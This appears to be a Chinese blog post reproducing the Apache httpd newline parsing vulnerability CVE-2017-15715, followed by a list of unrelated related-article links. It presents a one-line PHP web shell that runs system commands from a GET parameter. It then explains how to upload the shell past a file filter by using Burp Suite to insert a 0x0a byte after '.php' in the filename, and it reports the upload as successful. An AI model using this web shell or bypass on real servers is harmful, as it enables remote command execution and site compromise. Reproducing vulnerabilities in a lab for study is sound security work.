Apache httpd 换行解析漏洞复现(CVE-2017-15715)

Web页面:

新建一个一句话木马:

0.php

复制代码
<?php system($_GET[0]); ?>

上传木马, burpsuite 抓包。

直接上传是回显 bad file。

我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。

send 后,我们访问一下。发现木马上传成功。

相关推荐
北京耐用通信3 小时前
电磁阀通讯频频“掉链”?耐达讯自动化Ethernet/IP转DeviceNet救场全行业!
人工智能·物联网·网络协议·安全·自动化·信息与通信
斯南3 小时前
wireshark的基本使用,过滤请求,过滤数据,追踪数据
网络·测试工具·wireshark
yenggd3 小时前
首次eve-ng锐捷设备园区网案例实现
网络·智能路由器
银空飞羽6 小时前
让Trae SOLO全自主学习开发近期爆出的React RCE漏洞靶场并自主利用验证(CVE-2025-55182)
前端·人工智能·安全
面向星辰6 小时前
桌面运维岗 day02 计算机硬件_内存条
网络
Cher ~6 小时前
OSI 七层模型
网络·智能路由器
克喵的水银蛇6 小时前
Flutter 网络请求实战:Dio 封装 + 拦截器 + 数据解析
网络·flutter
汤愈韬7 小时前
知识点3:动态目的NAT的配置总结
网络·网络协议·网络安全·security·huawei
YJlio7 小时前
SDelete 学习笔记(9.18):安全删除、空闲清理与介质回收实战
笔记·学习·安全
CNRio8 小时前
第8章 网络安全应急响应
网络·安全·web安全